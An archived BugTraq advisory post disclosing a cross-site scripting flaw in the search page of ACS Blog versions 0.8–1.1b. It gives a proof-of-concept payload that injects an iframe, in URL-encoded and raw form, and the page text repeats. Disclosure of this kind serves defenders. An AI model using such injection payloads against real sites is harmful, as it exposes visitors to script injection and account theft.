BugTraq
Back to list
|
Post reply
XSS in ACS blog
Mar 17 2005 08:24AM
farhad koosha (farhadkey yahoo com)
XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).
Vulnerable :
ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b
Code :
/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com
%22%3E%3C%2Fiframe%3E
or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>
Vendor URL : http://www.asppress.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).
Vulnerable :
ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b
Code :
/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com
%22%3E%3C%2Fiframe%3E
or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>
Vendor URL : http://www.asppress.com
[ reply ]